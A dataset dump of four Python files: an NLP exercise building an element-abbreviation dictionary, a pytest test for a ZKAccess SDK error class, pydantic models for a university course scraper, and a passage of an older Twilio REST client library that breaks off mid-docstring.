| blob_id (string, 40 chars) | language (1 class) | repo_name (string, 5-133 chars) | path (string, 2-333 chars) | src_encoding (30 classes) | length_bytes (int64, 18-5.47M) | score (float64, 2.52-5.81) | int_score (int64, 3-5) | detected_licenses (list, 0-67 items) | license_type (2 classes) | text (string, 12-5.47M chars) | download_success (bool) |
|---|---|---|---|---|---|---|---|---|---|---|---|
cf8a206bd2639084dca2db1e5cbb7ceec80c855c
|
Python
|
Yanmo/language.processing
|
/py/q004.py
|
UTF-8
| 1,012
| 3.203125
| 3
|
[] |
no_license
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import codecs
import io
# for python 2.x
# sys.stdout = codecs.getwriter('utf_8')(sys.stdout)
# for python 3.x
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')
#"Hi He Lied Because Boron Could Not Oxidize Fluorine. New Nations Might Also Sign Peace Security Clause. Arthur King Can."という文を単語に分解し,1, 5, 6, 7, 8, 9, 15, 16, 19番目の単語は先頭の1文字,それ以外の単語は先頭に2文字を取り出し,取り出した文字列から単語の位置(先頭から何番目の単語か)への連想配列(辞書型もしくはマップ型)を作成せよ.
sentence = u"Hi He Lied Because Boron Could Not Oxidize Fluorine. New Nations Might Also Sign Peace Security Clause. Arthur King Can."
words = sentence.replace(",", "").replace(".", "").split()
hit = [1, 5, 6, 7, 8, 9, 15, 16, 19]
# enumerate(words, 1) gives each word its 1-based position directly and avoids repeated
# list.index() lookups, which would return the wrong position if a word were repeated
print({(word[:1] if i in hit else word[:2]): i for i, word in enumerate(words, 1)})
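# Expected result (worked out by hand from the sentence above; note position 12 yields 'Mi',
# since the code simply takes the first two letters of "Might"):
# {'H': 1, 'He': 2, 'Li': 3, 'Be': 4, 'B': 5, 'C': 6, 'N': 7, 'O': 8, 'F': 9, 'Ne': 10,
#  'Na': 11, 'Mi': 12, 'Al': 13, 'Si': 14, 'P': 15, 'S': 16, 'Cl': 17, 'Ar': 18, 'K': 19, 'Ca': 20}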
| true
|
efd11a9778ade94b89315001ac7767c72640fbeb
|
Python
|
yshaath/pyzkaccess
|
/tests/test_exceptions.py
|
UTF-8
| 818
| 2.84375
| 3
|
[
"Apache-2.0"
] |
permissive
|
import pytest
from pyzkaccess.exceptions import ZKSDKError
class TestZKSDKError:
def test_init__should_initialize_right_parameters(self):
obj = ZKSDKError('my message', -5)
assert obj.msg == 'my message'
assert obj.err == -5
@pytest.mark.parametrize('errno,description', (
(-5, 'SDK error -5: The length of the read data is not correct'),
(10066, 'WINSOCK error 10066: WSAENOTEMPTY (Directory not empty. Cannot remove a directory that is not empty)'),
(100500, 'Unknown error 100500'),
(-9000, 'Unknown error -9000'),
))
def test_str__should_return_error_description_and_message(self, errno, description):
expect = 'my message: {}'.format(description)
obj = ZKSDKError('my message', errno)
assert str(obj) == expect
| true
|
4c1404e818a669b257840092e6a1678bac0f71d1
|
Python
|
jackharrhy/muntrunk
|
/muntrunk/types.py
|
UTF-8
| 6,046
| 2.78125
| 3
|
[] |
no_license
|
from dataclasses import dataclass
from pydantic import BaseModel
from typing import Any, List, Optional, ForwardRef
Campus = ForwardRef("Campus")
class CommonTypes(BaseModel):
campuses: dict
instructors: dict
buildings: dict
rooms: dict
sessions: dict
subjects: dict
common_types = CommonTypes(
campuses={}, instructors={}, buildings={}, rooms={}, sessions={}, subjects={},
)
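# Added note: each grab(...) function below acts as a memoizing factory, caching instances in this
# module-level registry so that pieces referring to the same campus/building/room/etc. share one object.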
class Building(BaseModel):
letter: str
campus: Campus
def grab(letter, campus_name):
if not letter:
return None
key = f"{campus_name}_{letter}"
if not letter in common_types.buildings:
new_building = Building(letter=letter, campus=Campus.grab(campus_name))
common_types.buildings[key] = new_building
return new_building
else:
return common_types.buildings[key]
class Room(BaseModel):
building: Building
number: str
def grab(building, number):
if not building:
return None
key = f"{building.campus.name}_{building.letter}_{number}"
if not number in common_types.rooms:
new_room = Room(building=building, number=number)
common_types.rooms[key] = new_room
return new_room
else:
return common_types.rooms[key]
class Instructor(BaseModel):
name: str
def grab(name):
if not name:
return None
if not name in common_types.instructors:
new_instructor = Instructor(name=name)
common_types.instructors[name] = new_instructor
return new_instructor
else:
return common_types.instructors[name]
class Campus(BaseModel):
name: str
def grab(name):
if not name:
return None
if not name in common_types.campuses:
new_campus = Campus(name=name)
common_types.campuses[name] = new_campus
return new_campus
else:
return common_types.campuses[name]
class Session(BaseModel):
name: str
def grab(name):
if not name:
return None
if not name in common_types.sessions:
new_session = Session(name=name)
common_types.sessions[name] = new_session
return new_session
else:
return common_types.sessions[name]
class Subject(BaseModel):
name: str
def grab(name):
if not name:
return None
if not name in common_types.subjects:
new_subject = Subject(name=name)
common_types.subjects[name] = new_subject
return new_subject
else:
return common_types.subjects[name]
class Slot(BaseModel):
days_of_week: List[str]
begin: Optional[int]
end: Optional[int]
building: Optional[Building]
room: Optional[Room]
meta: List[str]
def from_piece(piece):
building = Building.grab(piece["room"]["building"], piece["campus"])
room = Room.grab(building, piece["room"]["room"])
return Slot(
days_of_week=piece["days"],
begin=piece["begin"],
end=piece["end"],
building=building,
room=room,
meta=[],
)
class Section(BaseModel):
crn: int
primary_instructor: Optional[Instructor]
secondary_instructor: Optional[Instructor]
wait_list: bool
pre_check: bool
schedule_type: Optional[str]
lab_sections: List[int]
credit_hours: int
billed_hours: Optional[int]
slots: List[Slot]
meta: List[str]
def from_piece(piece):
primary_instructor = Instructor.grab(piece["instructor"]["primary"])
secondary_instructor = Instructor.grab(piece["instructor"]["secondary"])
return Section(
crn=piece["crn"],
primary_instructor=primary_instructor,
secondary_instructor=secondary_instructor,
wait_list=piece["waitList"],
pre_check=piece["preCheck"],
schedule_type=piece["schedType"],
lab_sections=piece["labSections"],
credit_hours=piece["creditHours"],
billed_hours=piece["billHours"],
slots=[],
meta=[],
)
class Course(BaseModel):
campus: Campus
session: Session
subject: Subject
number: str
name: Optional[str]
sections: List[Section]
meta: List[str]
def from_piece(piece):
campus = Campus.grab(piece["campus"])
session = Session.grab(piece["session"])
subject = Subject.grab(piece["course"]["subject"])
return Course(
campus=campus,
session=session,
subject=subject,
number=piece["course"]["number"],
name=piece["course"]["name"],
sections=[],
meta=[],
)
class Semester(BaseModel):
year: int
term: int
level: int
courses: List[Course]
Campus.update_forward_refs()
Building.update_forward_refs()
@dataclass
class Types:
course: Any = None
section: Any = None
slot: Any = None
def types_from_piece(valid, piece):
types = Types(None, None, None)
if valid.course:
types.course = Course.from_piece(piece)
contains_time = valid.begin and valid.end
is_on_campus = contains_time and (
valid.crn or valid.schedule or valid.days_of_the_week
)
is_online = piece["slot"] == 99
is_edge_case_but_valid = valid.crn and valid.schedule
if is_on_campus or is_online or is_edge_case_but_valid:
if valid.crn:
types.section = Section.from_piece(piece)
if valid.course:
types.course.sections.append(types.section)
if valid.days_of_the_week:
types.slot = Slot.from_piece(piece)
if types.section:
types.section.slots.append(types.slot)
if not types.course and not types.section and not types.slot:
return None
return types
| true
|
d070beaaf8cc604e846d0065a08e94ac8b1e6703
|
Python
|
gtracy/twilio-demo
|
/app_engine/twilio/rest/resources.py
|
UTF-8
| 44,928
| 2.515625
| 3
|
[
"MIT"
] |
permissive
|
import datetime
import logging
import twilio
from twilio import TwilioException
from twilio import TwilioRestException
from urllib import urlencode
from urlparse import urlparse
# import json
try:
import simplejson as json
except ImportError:
try:
import json
except ImportError:
from django.utils import simplejson as json
# import httplib2
try:
import httplib2
except ImportError:
from twilio.contrib import httplib2
def transform_params(p):
"""
Transform parameters, throwing away any None values
and converting True and False values to strings
"""
p = [(d, convert_boolean(p[d])) for d in p if p[d] is not None]
return dict(p)
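# Illustrative example (not part of the original source): with the behavior above,
# transform_params({"To": "+15558675309", "Muted": True, "Timeout": None})
# returns {"To": "+15558675309", "Muted": "true"} -- None entries are dropped and booleans stringified.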
def parse_date(d):
"""
Return a string representation of a date that the Twilio API understands
Format is YYYY-MM-DD. Returns None if d is not a string, datetime, or date
"""
if isinstance(d, datetime.datetime):
return str(d.date())
elif isinstance(d, datetime.date):
return str(d)
elif isinstance(d, str):
return d
def convert_boolean(bool):
if bool == True:
return "true"
elif bool == False:
return "false"
else:
return bool
def convert_case(s):
"""
Given a string in snake_case, convert it to CamelCase
"""
return ''.join([a.title() for a in s.split("_") if a])
def convert_keys(d):
"""
Return a dictionary with all keys converted from arguments
"""
special = {
"started_before": "StartTime<",
"started_after": "StartTime>",
"started": "StartTime",
"ended_before": "EndTime<",
"ended_after": "EndTime>",
"ended": "EndTime",
"from_": "From",
}
result = {}
for k, v in d.iteritems():
if k in special:
result[special[k]] = v
else:
result[convert_case(k)] = v
return result
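# Illustrative example (not part of the original source):
# convert_keys({"from_": "+15558675309", "started_before": "2011-01-01", "status_callback": "http://example.com/cb"})
# returns {"From": "+15558675309", "StartTime<": "2011-01-01", "StatusCallback": "http://example.com/cb"}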
def normalize_dates(myfunc):
def inner_func(*args, **kwargs):
for k, v in kwargs.iteritems():
res = [True for s in ["after", "before", "on"] if s in k]
if len(res):
kwargs[k] = parse_date(v)
return myfunc(*args, **kwargs)
return inner_func
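# Illustrative effect of the decorator (not part of the original source): when a decorated method is
# called as list(before=datetime.date(2011, 1, 1)), the "before" keyword matches the substring check
# above, so parse_date converts it to the string "2011-01-01" before the wrapped method runs.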
class Response(object):
"""
Take a httplib2 response and turn it into a requests response
"""
def __init__(self, httplib_resp, content, url):
self.content = content
self.cached = False
self.status_code = int(httplib_resp.status)
self.ok = self.status_code < 400
self.url = url
def make_request(method, url,
params=None, data=None, headers=None, cookies=None, files=None,
auth=None, timeout=None, allow_redirects=False, proxies=None):
"""Sends an HTTP request Returns :class:`Response <models.Response>`
See the requests documentation for explanation of all these parameters
Currently timeout, allow_redirects, proxies, files, and cookies
are all ignored
"""
http = httplib2.Http()
if auth is not None:
http.add_credentials(auth[0], auth[1])
if data is not None:
data = urlencode(data)
if params is not None:
enc_params = urlencode(params, doseq=True)
if urlparse(url).query:
url = '%s&%s' % (url, enc_params)
else:
url = '%s?%s' % (url, enc_params)
resp, content = http.request(url, method, headers=headers, body=data)
# Format httplib2 responses as requests-style Response objects
return Response(resp, content, url)
def make_twilio_request(method, uri, **kwargs):
"""
Make a request to Twilio. Raises a TwilioRestException if the response indicates an error
"""
headers = kwargs.get("headers", {})
headers["User-Agent"] = "twilio-python/%s" % twilio.__version__
if method == "POST" and "Content-Type" not in headers:
headers["Content-Type"] = "application/x-www-form-urlencoded"
kwargs["headers"] = headers
if "Accept" not in headers:
headers["Accept"] = "application/json"
uri = uri + ".json"
resp = make_request(method, uri, **kwargs)
if not resp.ok:
try:
error = json.loads(resp.content)
message = "%s: %s" % (error["code"], error["message"])
except:
message = resp.content
raise TwilioRestException(resp.status_code, resp.url, message)
return resp
class Resource(object):
"""A REST Resource"""
name = "Resource"
def __init__(self, base_uri, auth):
self.base_uri = base_uri
self.auth = auth
def __eq__(self, other):
return (isinstance(other, self.__class__)
and self.__dict__ == other.__dict__)
def __ne__(self, other):
return not self.__eq__(other)
def request(self, method, uri, **kwargs):
"""
Send an HTTP request to the resource.
Raise a TwilioRestException
"""
resp = make_twilio_request(method, uri, auth=self.auth, **kwargs)
logging.debug(resp.content)
if method == "DELETE":
return resp, {}
else:
return resp, json.loads(resp.content)
@property
def uri(self):
format = (self.base_uri, self.name)
return "%s/%s" % format
class InstanceResource(Resource):
subresources = []
def __init__(self, parent, sid):
self.parent = parent
self.name = sid
super(InstanceResource, self).__init__(parent.uri,
parent.auth)
def load(self, entries):
if "from" in entries.keys():
entries["from_"] = entries["from"]
del entries["from"]
if "uri" in entries.keys():
del entries["uri"]
self.__dict__.update(entries)
def load_subresources(self):
"""
Load all subresources
"""
for resource in self.subresources:
list_resource = resource(self.uri, self.parent.auth)
self.__dict__[list_resource.key] = list_resource
def update_instance(self, **kwargs):
a = self.parent.update(self.name, **kwargs)
self.load(a.__dict__)
def delete_instance(self):
return self.parent.delete(self.name)
class ListResource(Resource):
name = "Resources"
instance = InstanceResource
def __init__(self, *args, **kwargs):
super(ListResource, self).__init__(*args, **kwargs)
try:
self.key
except AttributeError:
self.key = self.name.lower()
def get(self, sid):
"""Return an instance resource """
return self.get_instance(sid)
def get_instance(self, sid):
"""Request the specified instance resource"""
uri = "%s/%s" % (self.uri, sid)
resp, item = self.request("GET", uri)
return self.load_instance(item)
def get_instances(self, params=None, page=None, page_size=None):
"""
Query the list resource for a list of InstanceResources
"""
params = params or {}
if page is not None:
params["Page"] = page
if page_size is not None:
params["PageSize"] = page_size
resp, page = self.request("GET", self.uri, params=params)
if self.key not in page:
raise TwilioException("Key %s not present in response" % self.key)
return [self.load_instance(ir) for ir in page[self.key]]
def create_instance(self, body):
"""
Create an InstanceResource via a POST to the List Resource
:param dict body: Dictionary of POST data
"""
resp, instance = self.request("POST", self.uri, data=body)
if resp.status_code != 201:
raise TwilioRestException(resp.status,
self.uri, "Resource not created")
return self.load_instance(instance)
def delete_instance(self, sid):
"""
Delete an InstanceResource via DELETE
body: string -- HTTP body for the request
"""
uri = "%s/%s" % (self.uri, sid)
resp, instance = self.request("DELETE", uri)
return resp.status_code == 204
def update_instance(self, sid, body):
"""
Update an InstanceResource via a POST
sid: string -- String identifier for the list resource
body: string -- Dict of items to POST
"""
uri = "%s/%s" % (self.uri, sid)
resp, entry = self.request("POST", uri, data=body)
return self.load_instance(entry)
def count(self):
"""
Return the number of instance resources contained in this list resource
"""
resp, page = self.request("GET", self.uri)
return page["total"]
def iter(self, **kwargs):
"""
Return all instance resources using an iterator
Can only be called on classes which implement list()
TODO Make this use the next_url instead
"""
p = 0
try:
while True:
for r in self.list(page=p, **kwargs):
yield r
p += 1
except TwilioRestException:
pass
def load_instance(self, data):
instance = self.instance(self, data["sid"])
instance.load(data)
instance.load_subresources()
return instance
class AvailablePhoneNumber(InstanceResource):
""" An available phone number resource """
def __init__(self, parent):
super(AvailablePhoneNumber, self).__init__(parent, "")
self.name = ""
def purchase(self, **kwargs):
return self.parent.purchase(phone_number=self.phone_number,
**kwargs)
class AvailablePhoneNumbers(ListResource):
name = "AvailablePhoneNumbers"
key = "available_phone_numbers"
instance = AvailablePhoneNumber
types = {"local": "Local", "tollfree": "TollFree"}
def __init__(self, base_uri, auth, phone_numbers):
super(AvailablePhoneNumbers, self).__init__(base_uri, auth)
self.phone_numbers = phone_numbers
def get(self, sid):
raise TwilioException("Individual AvailablePhoneNumbers have no sid")
def list(self, type="local", country="US", region=None, area_code=None,
postal_code=None, near_number=None, near_lat_long=None, lata=None,
rate_center=None, distance=None, contains=None):
"""
Search for phone numbers
"""
params = transform_params({
"InRegion": region,
"InPostalCode": postal_code,
"Contains": contains,
"AreaCode": area_code,
"InLata": lata,
"InRateCenter": rate_center,
"Distance": distance,
"NearNumber": near_number,
"NearLatLong": near_lat_long,
})
uri = "%s/%s/%s" % (self.uri, country, self.types[type])
resp, page = self.request("GET", uri, params=params)
return [self.load_instance(i) for i in page[self.key]]
def load_instance(self, data):
instance = self.instance(self.phone_numbers)
instance.load(data)
instance.load_subresources()
return instance
class Transcription(InstanceResource):
pass
class Transcriptions(ListResource):
name = "Transcriptions"
instance = Transcription
def list(self, **kwargs):
"""
Return a list of :class:`Transcription` resources
"""
return self.get_instances(**kwargs)
class Recording(InstanceResource):
subresources = [
Transcriptions,
]
def __init__(self, *args, **kwargs):
super(Recording, self).__init__(*args, **kwargs)
self.formats = {
"mp3": self.uri + ".mp3",
"wav": self.uri + ".wav",
}
def delete(self):
"""
Delete this recording
"""
return self.delete_instance()
class Recordings(ListResource):
name = "Recordings"
instance = Recording
@normalize_dates
def list(self, call_sid=None, before=None, after=None, **kwargs):
"""
Returns a page of :class:`Recording` resources as a list.
For paging information see :class:`ListResource`.
:param date after: Only list recordings logged after this datetime
:param date before: Only list recordings logged before this datetime
:param call_sid: Only list recordings from this :class:`Call`
"""
params = transform_params({
"CallSid": call_sid,
"DateCreated<": before,
"DateCreated>": after,
})
return self.get_instances(params=params)
def delete(self, sid):
"""
Delete the given recording
"""
return self.delete_instance(sid)
class Notification(InstanceResource):
def delete(self):
"""
Delete this notification
"""
return self.delete_instance()
class Notifications(ListResource):
name = "Notifications"
instance = Notification
@normalize_dates
def list(self, before=None, after=None, log_level=None, **kwargs):
"""
Returns a page of :class:`Notification` resources as a list.
For paging information see :class:`ListResource`.
**NOTE**: Due to the potentially voluminous amount of data in a
notification, the full HTTP request and response data is only returned
in the Notification instance resource representation.
:param date after: Only list notifications logged after this datetime
:param date before: Only list notifications logged before this datetime
:param log_level: If 1, only shows errors. If 0, only show warnings
"""
params = transform_params({
"MessageDate<": before,
"MessageDate>": after,
"LogLevel": log_level,
})
return self.get_instances(params=params, **kwargs)
def delete(self, sid):
"""
Delete a given Notification
"""
return self.delete_instance(sid)
class Call(InstanceResource):
""" A call resource """
BUSY = "busy"
CANCELED = "canceled"
COMPLETED = "completed"
FAILED = "failed"
IN_PROGRESS = "in-progress"
NO_ANSWER = "no-answer"
QUEUED = "queued"
RINGING = "ringing"
subresources = [
Notifications,
Recordings,
]
def hangup(self):
""" If this call is currenlty active, hang up the call.
If this call is scheduled to be made, remove the call
from the queue
"""
a = self.parent.hangup(self.name)
self.load(a.__dict__)
def cancel(self):
""" If the called is queued or rining, cancel the calls.
Will not affect in progress calls
"""
a = self.parent.cancel(self.name)
self.load(a.__dict__)
def route(self, **kwargs):
"""Route the specified :class:`Call` to another url.
:param url: A valid URL that returns TwiML.
:param method: HTTP method Twilio uses when requesting the above URL.
"""
a = self.parent.route(self.name, **kwargs)
self.load(a.__dict__)
class Calls(ListResource):
""" A list of Call resources """
name = "Calls"
instance = Call
@normalize_dates
def list(self, to=None, from_=None, status=None, ended_after=None,
ended_before=None, ended=None, started_before=None,
started_after=None, started=None, **kwargs):
"""
Returns a page of :class:`Call` resources as a list. For paging
information see :class:`ListResource`
:param date after: Only list calls started after this datetime
:param date before: Only list calls started before this datetime
"""
params = transform_params({
"To": to,
"From": from_,
"Status": status,
"StartTime<": started_before,
"StartTime>": started_after,
"StartTime": parse_date(started),
"EndTime<": ended_before,
"EndTime>": ended_after,
"EndTime": parse_date(ended),
})
return self.get_instances(params=params, **kwargs)
def create(self, to, from_, url, method=None, fallback_url=None,
fallback_method=None, status_callback=None, status_method=None,
if_machine=None, send_digits=None, timeout=None,
application_sid=None):
"""
Make a phone call to a number
"""
params = transform_params({
"To": to,
"From": from_,
"Url": url,
"Method": method,
"FallbackUrl": fallback_url,
"FallbackMethod": fallback_method,
"StatusCallback": status_callback,
"StatusCallbackMethod": status_method,
"SendDigits": send_digits,
"Timeout": timeout,
"IfMachine": if_machine,
"ApplicationSid": application_sid,
})
return self.create_instance(params)
def update(self, sid, status=None, method=None, url=None):
params = transform_params({
"Status": status,
"Url": url,
"Method": method,
})
return self.update_instance(sid, params)
def cancel(self, sid):
""" If this call is queued or ringing, cancel the call
Will not affect in-progress calls.
:param sid: A Call Sid for a specific call
:returns: Updated :class:`Call` resource
"""
return self.update(sid, status=Call.CANCELED)
def hangup(self, sid):
""" If this call is currenlty active, hang up the call.
If this call is scheduled to be made, remove the call
from the queue
:param sid: A Call Sid for a specific call
:returns: Updated :class:`Call` resource
"""
return self.update(sid, status=Call.COMPLETED)
def route(self, sid, url, method="POST"):
"""Route the specified :class:`Call` to another url.
:param sid: A Call Sid for a specific call
:param url: A valid URL that returns TwiML.
:param method: The HTTP method Twilio uses when requesting the URL.
:returns: Updated :class:`Call` resource
"""
return self.update(sid, url=url, method=method)
class CallerId(InstanceResource):
def delete(self):
"""
Deletes this caller ID from the account.
"""
return self.delete_instance()
def update(self, **kwargs):
"""
Update the CallerId
"""
self.update_instance(**kwargs)
class CallerIds(ListResource):
""" A list of :class:`CallerId` resources """
name = "OutgoingCallerIds"
key = "outgoing_caller_ids"
instance = CallerId
def delete(self, sid):
"""
Deletes a specific :class:`CallerId` from the account.
"""
self.delete_instance(sid)
def list(self, phone_number=None, friendly_name=None, **kwargs):
"""
:param phone_number: Show caller ids with this phone number.
:param friendly_name: Show caller ids with this friendly name.
"""
params = transform_params({
"PhoneNumber": phone_number,
"FrienldyName": friendly_name,
})
return self.get_instances(params=params, **kwargs)
def update(self, sid, friendly_name=None):
"""
Update a specific :class:`CallerId`
"""
params = transform_params({
"FriendlyName": friendly_name,
})
return self.update_instance(sid, params)
def validate(self, phone_number, friendly_name=None, call_delay=None,
extension=None):
"""
Begin the validation process for the given number.
Returns a dictionary with the following keys
**account_sid**:
The unique id of the Account to which the Validation Request belongs.
**phone_number**: The incoming phone number being validated,
formatted with a '+' and country code e.g., +16175551212
**friendly_name**: The friendly name you provided, if any.
**validation_code**: The 6 digit validation code that must be entered
via the phone to validate this phone number for Caller ID.
:param phone_number: The phone number to call and validate
:param friendly_name: A description for the new caller ID
:param call_delay: Number of seconds to delay the validation call.
:param extension: Digits to dial after connecting the validation call.
:returns: A response dictionary
"""
params = transform_params({
"PhoneNumber": phone_number,
"FriendlyName": friendly_name,
"CallDelay": call_delay,
"Extension": extension,
})
resp, validation = self.request("POST", self.uri, data=params)
return validation
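# Illustrative response shape (keys per the docstring above; the values here are made up):
# {"account_sid": "ACXXXXXXXXXXXXXXXX", "phone_number": "+16175551212",
#  "friendly_name": "My office line", "validation_code": "123456"}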
class PhoneNumber(InstanceResource):
def transfer(self, account_sid):
"""
Transfer the phone number with sid from the current account to another
identified by account_sid
"""
pass
def update(self, **kwargs):
"""
Update this phone number instance
"""
a = self.parent.update(self.name, **kwargs)
self.load(a.__dict__)
def delete(self):
"""
Release this phone number from your account. Twilio will no longer
answer calls to this number, and you will stop being billed the monthly
phone number fees. The phone number will eventually be recycled and
potentially given to another customer, so use with care. If you make a
mistake, contact us... we may be able to give you the number back.
"""
return self.parent.delete(self.name)
class PhoneNumbers(ListResource):
name = "IncomingPhoneNumbers"
key = "incoming_phone_numbers"
instance = PhoneNumber
def __init__(self, base_uri, auth):
super(PhoneNumbers, self).__init__(base_uri, auth)
self.available_phone_numbers = \
AvailablePhoneNumbers(base_uri, auth, self)
def delete(self, sid):
"""
Release this phone number from your account. Twilio will no longer
answer calls to this number, and you will stop being billed the
monthly phone number fees. The phone number will eventually be
recycled and potentially given to another customer, so use with care.
If you make a mistake, contact us... we may be able to give you the
number back.
"""
return self.delete_instance(sid)
def list(self, phone_number=None, friendly_name=None, **kwargs):
"""
:param phone_number: Show phone numbers that match this pattern.
:param friendly_name: Show phone numbers with this friendly name
You can specify partial numbers and use '*' as a wildcard.
"""
params = transform_params({
"PhoneNumber": phone_number,
"FriendlyName": friendly_name,
})
return self.get_instances(params=params, **kwargs)
def purchase(self, phone_number=None, area_code=None, voice_url=None,
voice_method=None, voice_fallback_url=None,
voice_fallback_method=None,
status_callback_url=None, status_callback_method=None,
sms_url=None, sms_method=None, sms_fallback_url=None,
sms_fallback_method=None, voice_caller_id_lookup=None,
account_sid=None, application_sid=None):
"""
Attempt to purchase the specified number. The only required parameters
are **either** phone_number or area_code
:returns: Returns a :class:`PhoneNumber` instance on success,
:data:`False` on failure
"""
params = transform_params({
"VoiceUrl": voice_url,
"VoiceMethod": voice_method,
"VoiceFallbackUrl": voice_fallback_url,
"VoiceFallbackMethod": voice_fallback_method,
"SmsUrl": sms_url,
"SmsMethod": sms_method,
"SmsFallbackUrl": sms_fallback_url,
"SmsFallbackMethod": sms_fallback_method,
"StatusCallback": status_callback_url,
"StatusCallbackMethod": status_callback_method,
"VoiceCallerIdLookup": voice_caller_id_lookup,
"AccountSid": account_sid,
"ApplicationSid": application_sid,
})
if phone_number:
params["PhoneNumber"] = phone_number
elif area_code:
params["AreaCode"] = area_code
else:
raise TypeError("phone_number or area_code is required")
return self.create_instance(params)
def search(self, **kwargs):
"""
:param type: The type of phone number to search for.
:param string country: Either "US" or "CA". Defaults to "US"
:param string region: When searching the US, show numbers in this state
:param string postal_code: Only show numbers in this postal code
:param string rate_center: US only.
:param tuple near_lat_long: Find close numbers within Distance miles.
:param integer distance: Search radius for a Near- query in miles.
"""
return self.available_phone_numbers.list(**kwargs)
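# Illustrative usage (not part of the original source), assuming a PhoneNumbers instance named numbers:
# available = numbers.search(type="local", country="US", area_code="510")
# "available" is then a list of AvailablePhoneNumber objects, each purchasable via .purchase().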
def transfer(self, sid, account_sid):
"""
Transfer the phone number with sid from the current account to another
identified by account_sid
"""
# uses the AccountSid parameter, as in update() below, to move the number to the other account
return self.update_instance(sid, {"AccountSid": account_sid})
def update(self, sid, api_version=None, voice_url=None, voice_method=None,
voice_fallback_url=None, voice_fallback_method=None,
status_callback_method=None, sms_url=None, sms_method=None,
sms_fallback_url=None, sms_fallback_method=None,
voice_caller_id_lookup=None, account_sid=None,
application_sid=None):
"""
Update this phone number instance
"""
params = transform_params({
"ApiVersion": api_version,
"VoiceUrl": voice_url,
"VoiceMethod": voice_method,
"VoiceFallbackUrl": voice_fallback_url,
"VoiceFallbackMethod": voice_fallback_method,
"StatusCallbackMethod": status_callback_method,
"SmsUrl": sms_url,
"SmsMethod": sms_method,
"SmsFallbackUrl": sms_fallback_url,
"SmsFallbackMethod": sms_fallback_method,
"VoiceCallerIdLookup": voice_caller_id_lookup,
"AccountSid": account_sid,
"ApplicationSid": application_sid,
})
return self.update_instance(sid, params)
class Sandbox(InstanceResource):
id_key = "pin"
def update(self, **kwargs):
"""
Update your Twilio Sandbox
"""
a = self.parent.update(**kwargs)
self.load(a.__dict__)
class Sandboxes(ListResource):
name = "Sandbox"
instance = Sandbox
def get(self):
"""Request the specified instance resource"""
return self.get_instance(self.uri)
def update(self, voice_url=None, voice_method=None, sms_url=None,
sms_method=None):
"""
Update your Twilio Sandbox
"""
data = transform_params({
"VoiceUrl": voice_url,
"VoiceMethod": voice_method,
"SmsUrl": sms_url,
"SmsMethod": sms_method,
})
resp, entry = self.request("POST", self.uri, body=body)
return self.create_instance(entry)
class Sms(object):
"""
Holds all the specific SMS list resources
"""
name = "SMS"
key = "sms"
def __init__(self, base_uri, auth):
self.uri = "%s/SMS" % base_uri
self.messages = SmsMessages(self.uri, auth)
self.short_codes = ShortCodes(self.uri, auth)
class SmsMessage(InstanceResource):
pass
class SmsMessages(ListResource):
name = "Messages"
key = "sms_messages"
instance = SmsMessage
def create(self, to=None, from_=None, body=None, status_callback=None,
application_sid=None):
"""
Create and send a SMS Message.
:param to: The destination phone number.
:param from_: The phone number sending this message.
:param body: The message you want to send, limited to 160 characters.
:param status_callback: URL that Twilio will update with message info
"""
params = transform_params({
"To": to,
"From": from_,
"Body": body,
"StatusCallback": status_callback,
"ApplicationSid": application_sid,
})
return self.create_instance(params)
def list(self, to=None, from_=None, before=None, after=None, **kwargs):
"""
Returns a page of :class:`SMSMessage` resources as a list. For
paging information see :class:`ListResource`.
:param to: Only show SMS messages to this phone number.
:param from_: Only show SMS messages from this phone number.
:param date after: Only list messages sent after this datetime
:param date before: Only list messages sent before this datetime
"""
params = transform_params({
"To": to,
"From": from_,
"DateSent<": before,
"DateSent>": after,
})
return self.get_instances(params=params, **kwargs)
class ShortCode(InstanceResource):
def update(self, **kwargs):
return self.parent.update(self.name, **kwargs)
class ShortCodes(ListResource):
name = "ShortCodes"
key = "short_codes"
instance = ShortCode
def list(self, short_code=None, friendly_name=None, **kwargs):
"""
Returns a page of :class:`ShortCode` resources as a list. For
paging information see :class:`ListResource`.
:param short_code: Only show the ShortCode resources that match this
pattern. You can specify partial numbers and use '*'
as a wildcard for any digit.
:param friendly_name: Only show the ShortCode resources with friendly
names that exactly match this name.
"""
params = transform_params({
"ShortCode": short_code,
"FriendlyName": friendly_name,
})
return self.get_instances(params=params, **kwargs)
def update(self, sid, friendly_name=None, api_version=None, url=None,
method=None, fallback_url=None, fallback_method=None):
"""
Update a :class:`ShortCode` resource with any of these optional parameters.
:param friendly_name: Description of the short code, with maximum
length 64 characters.
:param api_version: SMSs to this short code will start a new TwiML
session with this API version.
:param url: The URL that Twilio should request when somebody sends an
SMS to the short code.
:param method: The HTTP method that should be used to request the url.
:param fallback_url: A URL that Twilio will request if an error occurs
requesting or executing the TwiML at the url.
:param fallback_method: The HTTP method that should be used to request
the fallback_url.
"""
params = transform_params({
"FriendlyName": friendly_name,
"ApiVersion": api_version,
"SmsUrl": url,
"SmsMethod": method,
"SmsFallbackUrl": fallback_url,
"SmsFallbackMethod": fallback_method,
})
return self.update_instance(sid, params)
class Participant(InstanceResource):
id_key = "call_sid"
def mute(self):
"""
Mute the participant
"""
self.update_instance(muted="true")
def unmute(self):
"""
Unmute the participant
"""
self.update_instance(muted="false")
def kick(self):
"""
Remove the participant from the given conference
"""
self.delete_instance()
class Participants(ListResource):
name = "Participants"
instance = Participant
def list(self, muted=None, **kwargs):
"""
Returns a list of :class:`Participant` resources in the given
conference
:param conference_sid: Conference this participant is part of
:param boolean muted: If True, only show participants who are muted
"""
params = transform_params({
"Muted": muted,
})
return self.get_instances(params=params, **kwargs)
def mute(self, call_sid):
"""
Mute the given participant
"""
return self.update(call_sid, muted=True)
def unmute(self, call_sid):
"""
Unmute the given participant
"""
return self.update(call_sid, muted=False)
def kick(self, call_sid):
"""
Remove the participant from the given conference
"""
return self.delete(call_sid)
def delete(self, call_sid):
"""
Remove the participant from the given conference
"""
return self._delete(call_sid)
def update(self, sid, muted=None):
"""
:param sid: Participant identifier
:param boolean muted: If true, mute this participant
"""
params = transform_params({
"Muted": muted
})
return self.update_instance(sid, params)
class Conference(InstanceResource):
subresources = [
Participants
]
class Conferences(ListResource):
name = "Conferences"
instance = Conference
def list(self, status=None, friendly_name=None, updated_before=None,
updated_after=None, created_after=None, created_before=None,
updated=None, created=None, **kwargs):
"""
Return a list of :class:`Conference` resources
:param status: Show conferences with this status
:param friendly_name: Show conferences with this exact friendly_name
:param date updated_after: List conferences updated after this date
